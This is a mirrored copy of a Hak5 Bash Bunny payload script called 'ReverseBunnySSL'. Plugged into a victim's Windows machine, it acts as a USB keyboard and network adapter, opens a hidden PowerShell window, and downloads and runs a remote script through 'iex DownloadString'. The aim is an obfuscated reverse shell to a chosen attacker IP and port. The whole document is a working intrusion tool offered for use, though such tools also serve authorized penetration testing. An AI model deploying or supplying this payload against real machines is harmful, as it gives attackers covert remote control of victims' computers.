mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
45 lines
1008 B
Bash
45 lines
1008 B
Bash
#!/bin/bash
|
|
#
|
|
# Title: ReverseBunnySSL
|
|
# Description: Get remote access, using an obfuscated powershell reverse shell.
|
|
# Author: 0i41E
|
|
# Version: 1.2
|
|
# Category: Remote_Access
|
|
# Attackmodes: HID, RNDIS_ETHERNET
|
|
|
|
LED SETUP
|
|
ATTACKMODE RNDIS_ETHERNET HID
|
|
|
|
GET SWITCH_POSITION
|
|
GET HOST_IP
|
|
|
|
cd /root/udisk/payloads/$SWITCH_POSITION/
|
|
|
|
# starting server
|
|
LED SPECIAL
|
|
|
|
# disallow outgoing dns requests so the server is accessible immediately
|
|
iptables -A OUTPUT -p udp --dport 53 -j DROP
|
|
python -m SimpleHTTPServer 80 &
|
|
|
|
# wait until port is listening
|
|
while ! nc -z localhost 80; do sleep 0.2; done
|
|
|
|
#Opens hidden powershell instance
|
|
Q DELAY 1500
|
|
Q GUI r
|
|
Q DELAY 500
|
|
Q STRING "powershell -NoP -NonI -w hidden"
|
|
Q DELAY 500
|
|
Q ENTER
|
|
|
|
Q DELAY 500
|
|
|
|
#Insert attacking IP & port below
|
|
Q STRING "\$I='0.0.0.0';\$P=4444;"
|
|
Q DELAY 250
|
|
Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/RBSSL.ps1\")"
|
|
Q DELAY 200
|
|
Q ENTER
|
|
LED FINISH
|